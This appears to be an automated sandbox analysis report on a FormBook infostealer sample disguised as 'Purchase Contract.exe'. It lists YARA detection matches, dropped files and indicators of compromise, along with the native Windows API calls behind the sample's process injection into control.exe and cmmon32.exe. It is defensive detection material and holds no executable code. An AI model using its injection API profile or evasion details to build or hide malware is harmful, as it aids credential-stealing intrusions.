Source: Yara matchFile source: 0000000F.00000002.1181813052.0000000003395000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000000.00000002.813092522.0000000005370000.00000040.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 0.2.Purchase Contract.exe.5370000.3.raw.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 15.2.updategtmlg.exe.49a0000.3.raw.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 13.2.updategtmlg.exe.57c0000.4.raw.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 15.2.updategtmlg.exe.49a0000.3.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 13.2.updategtmlg.exe.57c0000.4.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 0.2.Purchase Contract.exe.5370000.3.unpack, type: UNPACKEDPE

System Summary:

barindex
Detected FormBook malwareShow sources
Source: C:\Windows\SysWOW64\control.exeDropped file: C:\Users\user\AppData\Roaming\72R9-CPB\72Rlogri.iniJump to dropped file
Source: C:\Windows\SysWOW64\control.exeDropped file: C:\Users\user\AppData\Roaming\72R9-CPB\72Rlogrf.iniJump to dropped file
Source: C:\Windows\SysWOW64\control.exeDropped file: C:\Users\user\AppData\Roaming\72R9-CPB\72Rlogrv.iniJump to dropped file
Malicious sample detected (through community Yara rule)Show sources
Source: 00000003.00000002.2006818484.0000000002960000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000003.00000002.2006818484.0000000002960000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000D.00000002.1173710759.0000000005AC0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000D.00000002.1173710759.0000000005AC0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000D.00000002.1173061376.00000000058F0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000D.00000002.1173061376.00000000058F0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000003.00000002.2004131624.00000000000A0000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000003.00000002.2004131624.00000000000A0000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000000.00000002.810255686.0000000003F45000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.810255686.0000000003F45000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000F.00000002.1185291001.00000000049A0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000F.00000002.1185291001.00000000049A0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000E.00000002.1169125145.0000000000C20000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000E.00000002.1169125145.0000000000C20000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000D.00000002.1170396404.0000000004215000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000D.00000002.1170396404.0000000004215000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000000.00000002.813188123.00000000054A0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.813188123.00000000054A0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000010.00000002.1182644946.00000000007C0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000010.00000002.1182644946.00000000007C0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000000.00000002.813243423.00000000054D0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.813243423.00000000054D0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000D.00000002.1172899855.00000000057C0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000D.00000002.1172899855.00000000057C0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000F.00000002.1185813243.0000000004C50000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000F.00000002.1185813243.0000000004C50000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000F.00000002.1185451229.0000000004AE0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000F.00000002.1185451229.0000000004AE0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000F.00000002.1181813052.0000000003395000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000F.00000002.1181813052.0000000003395000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000000.00000002.813092522.0000000005370000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.813092522.0000000005370000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0.2.Purchase Contract.exe.5370000.3.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0.2.Purchase Contract.exe.5370000.3.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 15.2.updategtmlg.exe.49a0000.3.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 15.2.updategtmlg.exe.49a0000.3.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 13.2.updategtmlg.exe.57c0000.4.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 13.2.updategtmlg.exe.57c0000.4.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 15.2.updategtmlg.exe.49a0000.3.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 15.2.updategtmlg.exe.49a0000.3.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 13.2.updategtmlg.exe.57c0000.4.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 13.2.updategtmlg.exe.57c0000.4.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0.2.Purchase Contract.exe.5370000.3.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0.2.Purchase Contract.exe.5370000.3.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Initial sample is a PE file and has a suspicious nameShow sources
Source: initial sampleStatic PE information: Filename: Purchase Contract.exe
Contains functionality to call native functionsShow sources
Source: C:\Users\user\Desktop\Purchase Contract.exeCode function: 0_2_05D9A5F0 NtReadVirtualMemory,LdrInitializeThunk,0_2_05D9A5F0
Source: C:\Users\user\Desktop\Purchase Contract.exeCode function: 0_2_05D9A540 NtDelayExecution,LdrInitializeThunk,0_2_05D9A540
Source: C:\Users\user\Desktop\Purchase Contract.exeCode function: 0_2_05D9A560 NtQuerySystemInformation,LdrInitializeThunk,0_2_05D9A560
Source: C:\Users\user\Desktop\Purchase Contract.exeCode function: 0_2_05D9A480 NtMapViewOfSection,LdrInitializeThunk,0_2_05D9A480
Source: C:\Users\user\Desktop\Purchase Contract.exeCode function: 0_2_05D9A4A0 NtUnmapViewOfSection,LdrInitializeThunk,0_2_05D9A4A0
Source: C:\Users\user\Desktop\Purchase Contract.exeCode function: 0_2_05D9A410 NtQueryInformationToken,LdrInitializeThunk,0_2_05D9A410
Source: C:\Users\user\Desktop\Purchase Contract.exeCode function: 0_2_05D9A750 NtCreateFile,LdrInitializeThunk,0_2_05D9A750
Source: C:\Users\user\Desktop\Purchase Contract.exeCode function: 0_2_05D9A700 NtProtectVirtualMemory,LdrInitializeThunk,0_2_05D9A700
Source: C:\Users\user\Desktop\Purchase Contract.exeCode function: 0_2_05D9A720 NtResumeThread,LdrInitializeThunk,0_2_05D9A720
Source: C:\Users\user\Desktop\Purchase Contract.exeCode function: 0_2_05D9A6A0 NtCreateSection,LdrInitializeThunk,0_2_05D9A6A0
Source: C:\Users\user\Desktop\Purchase Contract.exeCode function: 0_2_05D9A610 NtAdjustPrivilegesToken,LdrInitializeThunk,0_2_05D9A610
Source: C:\Users\user\Desktop\Purchase Contract.exeCode function: 0_2_05D9A3E0 NtFreeVirtualMemory,LdrInitializeThunk,0_2_05D9A3E0
Source: C:\Users\user\Desktop\Purchase Contract.exeCode function: 0_2_05D9A360 NtAllocateVirtualMemory,LdrInitializeThunk,0_2_05D9A360
Source: C:\Users\user\Desktop\Purchase Contract.exeCode function: 0_2_05D9A2D0 NtClose,LdrInitializeThunk,0_2_05D9A2D0
Source: C:\Users\user\Desktop\Purchase Contract.exeCode function: 0_2_05D9A240 NtReadFile,LdrInitializeThunk,0_2_05D9A240
Source: C:\Users\user\Desktop\Purchase Contract.exeCode function: 0_2_05D9A5A0 NtWriteVirtualMemory,0_2_05D9A5A0
Source: C:\Users\user\Desktop\Purchase Contract.exeCode function: 0_2_05D9BD40 NtSuspendThread,0_2_05D9BD40
Source: C:\Users\user\Desktop\Purchase Contract.exeCode function: 0_2_05D9A520 NtEnumerateKey,0_2_05D9A520
Source: C:\Users\user\Desktop\Purchase Contract.exeCode function: 0_2_05D9ACE0 NtCreateMutant,0_2_05D9ACE0
Source: C:\Users\user\Desktop\Purchase Contract.exeCode function: 0_2_05D9B470 NtOpenThread,0_2_05D9B470
Source: C:\Users\user\Desktop\Purchase Contract.exeCode function: 0_2_05D9A470 NtSetInformationFile,0_2_05D9A470
Source: C:\Users\user\Desktop\Purchase Contract.exeCode function: 0_2_05D9A460 NtOpenProcess,0_2_05D9A460
Source: C:\Users\user\Desktop\Purchase Contract.exeCode function: 0_2_05D9B410 NtOpenProcessToken,0_2_05D9B410
Source: C:\Users\user\Desktop\Purchase Contract.exeCode function: 0_2_05D9A430 NtQueryVirtualMemory,0_2_05D9A430
Source: C:\Users\user\Desktop\Purchase Contract.exeCode function: 0_2_05D9A780 NtOpenDirectoryObject,0_2_05D9A780
Source: C:\Users\user\Desktop\Purchase Contract.exeCode function: 0_2_05D9A710 NtQuerySection,0_2_05D9A710
Source: C:\Users\user\Desktop\Purchase Contract.exeCode function: 0_2_05D9A6D0 NtCreateProcessEx,0_2_05D9A6D0
Source: C:\Users\user\Desktop\Purchase Contract.exeCode function: 0_2_05D9A650 NtQueueApcThread,0_2_05D9A650
Source: C:\Users\user\Desktop\Purchase Contract.exeCode function: 0_2_05D9B0B0 NtGetContextThread,0_2_05D9B0B0
Source: C:\Users\user\Desktop\Purchase Contract.exeCode function: 0_2_05D9A800 NtSetValueKey,0_2_05D9A800
Source: C:\Users\user\Desktop\Purchase Contract.exeCode function: 0_2_05D9A3D0 NtCreateKey,0_2_05D9A3D0
Source: C:\Users\user\Desktop\Purchase Contract.exeCode function: 0_2_05D9A350 NtQueryValueKey,0_2_05D9A350
Source: C:\Users\user\Desktop\Purchase Contract.exeCode function: 0_2_05D9A370 NtQueryInformationProcess,0_2_05D9A370
Source: C:\Users\user\Desktop\Purchase Contract.exeCode function: 0_2_05D9A310 NtEnumerateValueKey,0_2_05D9A310
Source: C:\Users\user\Desktop\Purchase Contract.exeCode function: 0_2_05D9A2F0 NtQueryInformationFile,0_2_05D9A2F0
Source: C:\Users\user\Desktop\Purchase Contract.exeCode function: 0_2_05D9A260 NtWriteFile,0_2_05D9A260
Source: C:\Users\user\Desktop\Purchase Contract.exeCode function: 0_2_05D9BA30 NtSetContextThread,0_2_05D9BA30
Source: C:\Users\user\Desktop\Purchase Contract.exeCode function: 0_2_05D9A220 NtWaitForSingleObject,0_2_05D9A220
Source: C:\Windows\SysWOW64\control.exeCode function: 3_2_044FA470 NtSetInformationFile,LdrInitializeThunk,3_2_044FA470
Source: C:\Windows\SysWOW64\control.exeCode function: 3_2_044FA410 NtQueryInformationToken,LdrInitializeThunk,3_2_044FA410
Source: C:\Windows\SysWOW64\control.exeCode function: 3_2_044FACE0 NtCreateMutant,LdrInitializeThunk,3_2_044FACE0
Source: C:\Windows\SysWOW64\control.exeCode function: 3_2_044FA480 NtMapViewOfSection,LdrInitializeThunk,3_2_044FA480
Source: C:\Windows\SysWOW64\control.exeCode function: 3_2_044FA540 NtDelayExecution,LdrInitializeThunk,3_2_044FA540
Source: C:\Windows\SysWOW64\control.exeCode function: 3_2_044FA560 NtQuerySystemInformation,LdrInitializeThunk,3_2_044FA560
Source: C:\Windows\SysWOW64\control.exeCode function: 3_2_044FA610 NtAdjustPrivilegesToken,LdrInitializeThunk,3_2_044FA610
Source: C:\Windows\SysWOW64\control.exeCode function: 3_2_044FA6A0 NtCreateSection,LdrInitializeThunk,3_2_044FA6A0
Source: C:\Windows\SysWOW64\control.exeCode function: 3_2_044FA750 NtCreateFile,LdrInitializeThunk,3_2_044FA750
Source: C:\Windows\SysWOW64\control.exeCode function: 3_2_044FA800 NtSetValueKey,LdrInitializeThunk,3_2_044FA800
Source: C:\Windows\SysWOW64\control.exeCode function: 3_2_044FA240 NtReadFile,LdrInitializeThunk,3_2_044FA240
Source: C:\Windows\SysWOW64\control.exeCode function: 3_2_044FA260 NtWriteFile,LdrInitializeThunk,3_2_044FA260
Source: C:\Windows\SysWOW64\control.exeCode function: 3_2_044FA2D0 NtClose,LdrInitializeThunk,3_2_044FA2D0
Source: C:\Windows\SysWOW64\control.exeCode function: 3_2_044FA350 NtQueryValueKey,LdrInitializeThunk,3_2_044FA350
Source: C:\Windows\SysWOW64\control.exeCode function: 3_2_044FA360 NtAllocateVirtualMemory,LdrInitializeThunk,3_2_044FA360
Source: C:\Windows\SysWOW64\control.exeCode function: 3_2_044FA310 NtEnumerateValueKey,LdrInitializeThunk,3_2_044FA310
Source: C:\Windows\SysWOW64\control.exeCode function: 3_2_044FA3D0 NtCreateKey,LdrInitializeThunk,3_2_044FA3D0
Source: C:\Windows\SysWOW64\control.exeCode function: 3_2_044FA3E0 NtFreeVirtualMemory,LdrInitializeThunk,3_2_044FA3E0
Source: C:\Windows\SysWOW64\control.exeCode function: 3_2_044FA460 NtOpenProcess,3_2_044FA460
Source: C:\Windows\SysWOW64\control.exeCode function: 3_2_044FB470 NtOpenThread,3_2_044FB470
Source: C:\Windows\SysWOW64\control.exeCode function: 3_2_044FB410 NtOpenProcessToken,3_2_044FB410
Source: C:\Windows\SysWOW64\control.exeCode function: 3_2_044FA430 NtQueryVirtualMemory,3_2_044FA430
Source: C:\Windows\SysWOW64\control.exeCode function: 3_2_044FA4A0 NtUnmapViewOfSection,3_2_044FA4A0
Source: C:\Windows\SysWOW64\control.exeCode function: 3_2_044FBD40 NtSuspendThread,3_2_044FBD40
Source: C:\Windows\SysWOW64\control.exeCode function: 3_2_044FA520 NtEnumerateKey,3_2_044FA520
Source: C:\Windows\SysWOW64\control.exeCode function: 3_2_044FA5F0 NtReadVirtualMemory,3_2_044FA5F0
Source: C:\Windows\SysWOW64\control.exeCode function: 3_2_044FA5A0 NtWriteVirtualMemory,3_2_044FA5A0
Source: C:\Windows\SysWOW64\control.exeCode function: 3_2_044FA650 NtQueueApcThread,3_2_044FA650
Source: C:\Windows\SysWOW64\control.exeCode function: 3_2_044FA6D0 NtCreateProcessEx,3_2_044FA6D0
Source: C:\Windows\SysWOW64\control.exeCode function: 3_2_044FA700 NtProtectVirtualMemory,3_2_044FA700
Source: C:\Windows\SysWOW64\control.exeCode function: 3_2_044FA710 NtQuerySection,3_2_044FA710
Source: C:\Windows\SysWOW64\control.exeCode function: 3_2_044FA720 NtResumeThread,3_2_044FA720
Source: C:\Windows\SysWOW64\control.exeCode function: 3_2_044FA780 NtOpenDirectoryObject,3_2_044FA780
Source: C:\Windows\SysWOW64\control.exeCode function: 3_2_044FB0B0 NtGetContextThread,3_2_044FB0B0
Source: C:\Windows\SysWOW64\control.exeCode function: 3_2_044FA220 NtWaitForSingleObject,3_2_044FA220
Source: C:\Windows\SysWOW64\control.exeCode function: 3_2_044FBA30 NtSetContextThread,3_2_044FBA30
Source: C:\Windows\SysWOW64\control.exeCode function: 3_2_044FA2F0 NtQueryInformationFile,3_2_044FA2F0
Source: C:\Windows\SysWOW64\control.exeCode function: 3_2_044FA370 NtQueryInformationProcess,3_2_044FA370
Source: C:\Windows\SysWOW64\control.exeCode function: 3_2_02976BC0 NtCreateFile,3_2_02976BC0
Source: C:\Windows\SysWOW64\control.exeCode function: 3_2_02976CF0 NtClose,3_2_02976CF0
Source: C:\Windows\SysWOW64\control.exeCode function: 3_2_02976C70 NtReadFile,3_2_02976C70
Source: C:\Windows\SysWOW64\control.exeCode function: 3_2_02976DA0 NtAllocateVirtualMemory,3_2_02976DA0
Source: C:\Windows\SysWOW64\control.exeCode function: 3_2_02976CEA NtClose,3_2_02976CEA
Source: C:\Windows\SysWOW64\control.exeCode function: 3_2_02976C6A NtReadFile,3_2_02976C6A
Source: C:\Windows\SysWOW64\control.exeCode function: 3_2_02976D9C NtAllocateVirtualMemory,3_2_02976D9C
Source: C:\Program Files (x86)\S-zzxp\updategtmlg.exeCode function: 13_2_0622A610 NtAdjustPrivilegesToken,LdrInitializeThunk,13_2_0622A610
Source: C:\Program Files (x86)\S-zzxp\updategtmlg.exeCode function: 13_2_0622A6A0 NtCreateSection,LdrInitializeThunk,13_2_0622A6A0
Source: C:\Program Files (x86)\S-zzxp\updategtmlg.exeCode function: 13_2_0622A720 NtResumeThread,LdrInitializeThunk,13_2_0622A720
Source: C:\Program Files (x86)\S-zzxp\updategtmlg.exeCode function: 13_2_0622A700 NtProtectVirtualMemory,LdrInitializeThunk,13_2_0622A700
Source: C:\Program Files (x86)\S-zzxp\updategtmlg.exeCode function: 13_2_0622A750 NtCreateFile,LdrInitializeThunk,13_2_0622A750
Source: C:\Program Files (x86)\S-zzxp\updategtmlg.exeCode function: 13_2_0622A410 NtQueryInformationToken,LdrInitializeThunk,13_2_0622A410
Source: C:\Program Files (x86)\S-zzxp\updategtmlg.exeCode function: 13_2_0622A4A0 NtUnmapViewOfSection,LdrInitializeThunk,13_2_0622A4A0
Source: C:\Program Files (x86)\S-zzxp\updategtmlg.exeCode function: 13_2_0622A480 NtMapViewOfSection,LdrInitializeThunk,13_2_0622A480
Source: C:\Program Files (x86)\S-zzxp\updategtmlg.exeCode function: 13_2_0622A560 NtQuerySystemInformation,LdrInitializeThunk,13_2_0622A560
Source: C:\Program Files (x86)\S-zzxp\updategtmlg.exeCode function: 13_2_0622A540 NtDelayExecution,LdrInitializeThunk,13_2_0622A540
Source: C:\Program Files (x86)\S-zzxp\updategtmlg.exeCode function: 13_2_0622A5F0 NtReadVirtualMemory,LdrInitializeThunk,13_2_0622A5F0
Source: C:\Program Files (x86)\S-zzxp\updategtmlg.exeCode function: 13_2_0622A240 NtReadFile,LdrInitializeThunk,13_2_0622A240
Source: C:\Program Files (x86)\S-zzxp\updategtmlg.exeCode function: 13_2_0622A2D0 NtClose,LdrInitializeThunk,13_2_0622A2D0
Source: C:\Program Files (x86)\S-zzxp\updategtmlg.exeCode function: 13_2_0622A360 NtAllocateVirtualMemory,LdrInitializeThunk,13_2_0622A360
Source: C:\Program Files (x86)\S-zzxp\updategtmlg.exeCode function: 13_2_0622A3E0 NtFreeVirtualMemory,LdrInitializeThunk,13_2_0622A3E0
Source: C:\Program Files (x86)\S-zzxp\updategtmlg.exeCode function: 13_2_0622A650 NtQueueApcThread,13_2_0622A650
Source: C:\Program Files (x86)\S-zzxp\updategtmlg.exeCode function: 13_2_0622A6D0 NtCreateProcessEx,13_2_0622A6D0
Source: C:\Program Files (x86)\S-zzxp\updategtmlg.exeCode function: 13_2_0622A710 NtQuerySection,13_2_0622A710
Source: C:\Program Files (x86)\S-zzxp\updategtmlg.exeCode function: 13_2_0622A780 NtOpenDirectoryObject,13_2_0622A780
Source: C:\Program Files (x86)\S-zzxp\updategtmlg.exeCode function: 13_2_0622A430 NtQueryVirtualMemory,13_2_0622A430
Source: C:\Program Files (x86)\S-zzxp\updategtmlg.exeCode function: 13_2_0622B410 NtOpenProcessToken,13_2_0622B410
Source: C:\Program Files (x86)\S-zzxp\updategtmlg.exeCode function: 13_2_0622A460 NtOpenProcess,13_2_0622A460
Source: C:\Program Files (x86)\S-zzxp\updategtmlg.exeCode function: 13_2_0622B470 NtOpenThread,13_2_0622B470
Source: C:\Program Files (x86)\S-zzxp\updategtmlg.exeCode function: 13_2_0622A470 NtSetInformationFile,13_2_0622A470
Source: C:\Program Files (x86)\S-zzxp\updategtmlg.exeCode function: 13_2_0622ACE0 NtCreateMutant,13_2_0622ACE0
Source: C:\Program Files (x86)\S-zzxp\updategtmlg.exeCode function: 13_2_0622A520 NtEnumerateKey,13_2_0622A520
Source: C:\Program Files (x86)\S-zzxp\updategtmlg.exeCode function: 13_2_0622BD40 NtSuspendThread,13_2_0622BD40
Source: C:\Program Files (x86)\S-zzxp\updategtmlg.exeCode function: 13_2_0622A5A0 NtWriteVirtualMemory,13_2_0622A5A0
Source: C:\Program Files (x86)\S-zzxp\updategtmlg.exeCode function: 13_2_0622A220 NtWaitForSingleObject,13_2_0622A220
Source: C:\Program Files (x86)\S-zzxp\updategtmlg.exeCode function: 13_2_0622BA30 NtSetContextThread,13_2_0622BA30
Source: C:\Program Files (x86)\S-zzxp\updategtmlg.exeCode function: 13_2_0622A260 NtWriteFile,13_2_0622A260
Source: C:\Program Files (x86)\S-zzxp\updategtmlg.exeCode function: 13_2_0622A2F0 NtQueryInformationFile,13_2_0622A2F0
Source: C:\Program Files (x86)\S-zzxp\updategtmlg.exeCode function: 13_2_0622A310 NtEnumerateValueKey,13_2_0622A310
Source: C:\Program Files (x86)\S-zzxp\updategtmlg.exeCode function: 13_2_0622A370 NtQueryInformationProcess,13_2_0622A370
Source: C:\Program Files (x86)\S-zzxp\updategtmlg.exeCode function: 13_2_0622A350 NtQueryValueKey,13_2_0622A350
Source: C:\Program Files (x86)\S-zzxp\updategtmlg.exeCode function: 13_2_0622A3D0 NtCreateKey,13_2_0622A3D0
Source: C:\Program Files (x86)\S-zzxp\updategtmlg.exeCode function: 13_2_0622A800 NtSetValueKey,13_2_0622A800
Source: C:\Program Files (x86)\S-zzxp\updategtmlg.exeCode function: 13_2_0622B0B0 NtGetContextThread,13_2_0622B0B0
Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 14_2_04E1ACE0 NtCreateMutant,LdrInitializeThunk,14_2_04E1ACE0
Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 14_2_04E1A560 NtQuerySystemInformation,LdrInitializeThunk,14_2_04E1A560
Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 14_2_04E1A610 NtAdjustPrivilegesToken,LdrInitializeThunk,14_2_04E1A610
Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 14_2_04E1A2D0 NtClose,LdrInitializeThunk,14_2_04E1A2D0
Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 14_2_04E1A3E0 NtFreeVirtualMemory,LdrInitializeThunk,14_2_04E1A3E0
Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 14_2_04E1A360 NtAllocateVirtualMemory,LdrInitializeThunk,14_2_04E1A360
Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 14_2_04E1A4A0 NtUnmapViewOfSection,14_2_04E1A4A0
Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 14_2_04E1A480 NtMapViewOfSection,14_2_04E1A480
Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 14_2_04E1A460 NtOpenProcess,14_2_04E1A460
Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 14_2_04E1B470 NtOpenThread,14_2_04E1B470
Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 14_2_04E1A470 NtSetInformationFile,14_2_04E1A470
Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 14_2_04E1A430 NtQueryVirtualMemory,14_2_04E1A430
Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 14_2_04E1A410 NtQueryInformationToken,14_2_04E1A410
Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 14_2_04E1B410 NtOpenProcessToken,14_2_04E1B410
Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 14_2_04E1A5F0 NtReadVirtualMemory,14_2_04E1A5F0
Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 14_2_04E1A5A0 NtWriteVirtualMemory,14_2_04E1A5A0
Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 14_2_04E1BD40 NtSuspendThread,14_2_04E1BD40
Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 14_2_04E1A540 NtDelayExecution,14_2_04E1A540
Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 14_2_04E1A520 NtEnumerateKey,14_2_04E1A520
Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 14_2_04E1A6D0 NtCreateProcessEx,14_2_04E1A6D0
Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 14_2_04E1A6A0 NtCreateSection,14_2_04E1A6A0
Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 14_2_04E1A650 NtQueueApcThread,14_2_04E1A650
Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 14_2_04E1A780 NtOpenDirectoryObject,14_2_04E1A780
Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 14_2_04E1A750 NtCreateFile,14_2_04E1A750
Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 14_2_04E1A720 NtResumeThread,14_2_04E1A720
Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 14_2_04E1A700 NtProtectVirtualMemory,14_2_04E1A700
Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 14_2_04E1A710 NtQuerySection,14_2_04E1A710
Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 14_2_04E1B0B0 NtGetContextThread,14_2_04E1B0B0
Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 14_2_04E1A800 NtSetValueKey,14_2_04E1A800
Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 14_2_04E1A2F0 NtQueryInformationFile,14_2_04E1A2F0
Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 14_2_04E1A260 NtWriteFile,14_2_04E1A260
Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 14_2_04E1A240 NtReadFile,14_2_04E1A240
Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 14_2_04E1A220 NtWaitForSingleObject,14_2_04E1A220
Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 14_2_04E1BA30 NtSetContextThread,14_2_04E1BA30
Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 14_2_04E1A3D0 NtCreateKey,14_2_04E1A3D0
Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 14_2_04E1A370 NtQueryInformationProcess,14_2_04E1A370
Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 14_2_04E1A350 NtQueryValueKey,14_2_04E1A350
Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 14_2_04E1A310 NtEnumerateValueKey,14_2_04E1A310
Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 14_2_00C36BC0 NtCreateFile,14_2_00C36BC0
Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 14_2_00C36CF0 NtClose,14_2_00C36CF0
